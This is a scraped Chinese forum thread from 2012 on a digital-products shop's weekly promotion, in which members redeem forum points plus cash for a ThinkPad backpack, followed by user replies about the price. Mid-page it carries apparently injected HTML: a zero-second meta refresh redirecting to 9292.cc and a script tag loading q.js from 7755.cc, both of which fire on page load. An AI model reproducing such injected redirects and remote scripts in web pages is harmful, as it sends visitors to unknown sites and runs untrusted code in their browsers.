开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

【抢楼换购】翔币换购活动预告

活动介绍:为了感谢大家对翔意的支持,从即日起,每周推出抢楼活动,即在指定抢楼贴内抢到指定楼层,获得以一定数量翔币冲抵现金购买配件的资格(10翔币=1人民币),如150元人民币+780翔币即可购买原价¥228元的双肩包。
抢楼时间: 每周五
换购配件是什么: 当期公布(期期不同)。
参加条件: 必须是翔意注册用户,当然你得有一定数量的翔币(如何得到翔币:http://www.xynbnb.com/viewthread.php?tid=23253&extra=page%3D1
抢楼换购规则: 开始时间为每周5的早上10点,以抢到指定楼层为结束,若周六早上10点仍未达到指定楼层,则本期活动自动结束。在这个时间内,所有人均可在抢楼贴内回复任意内容灌水聊天均可,发表违规内容直接禁言。
               抢到指定楼层的注册用户,我将主动与您联系。
               若抢到楼层的用户翔币不足,可以用现金冲抵不足的翔币。
Thinkpad 原装双肩包
翔币换购价:¥150+780翔币

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

哇,这下mini有好多钱。。。。。
mini好多钱也不见得可以抢到哦~这个和拍卖不一样
我一算,还是穷人呀。
新活动一出,我顿时温饱边缘了……
不会的 你不一定可以抢到哈哈
支持一下。。。
买不起呀
全用xb换行不
1:30换吧
这样啊,这活动别的论坛一直在搞,没啥意思。就是XB+现金=原价基础降一点,用XB充点。
没新意!
clg176 发表于 2012-4-19 13:36
这样啊,这活动别的论坛一直在搞,没啥意思。就是XB+现金=原价基础降一点,用XB充点。
没新意! ...

白送大家最喜欢了,对吧

不是这个意思  发表于 2012-4-19 14:43
不错,就是钱太少了呀

3000足够了 因为大多数扣的翔币都不到1000.三千翔币等于300块钱呢  发表于 2012-4-19 17:34
呵呵,好不好,看疗效
clg176 发表于 2012-4-19 13:36
没新意! ...

其实最早我们在搞,只是后来冷落了一些
抢多少楼啦。
还没开始呢

加的人民币太多了……

150元人民币+780翔币

既然是会员活动,能不能把人民币比例调低一些?毕竟以前拍卖用XB直接拍,一分钱不用花,现在一下要加150元买,这差距有点儿大呀???

建议人民币的价格调节到成本价的标准,这样XY既不赔钱又能搞个实惠活动回报会员,论坛也能更多的吸引人们加入。
顶楼上~~
mini  这会发呆了···········
关注中。。。。
yunwai 发表于 2012-4-19 21:26
mini  这会发呆了···········

我为啥要发呆呢??
看效果            
dengyan 发表于 2012-4-19 17:37
加的人民币太多了……

150元人民币+780翔币

dengyan说的对啊!!!
木拍卖的日子里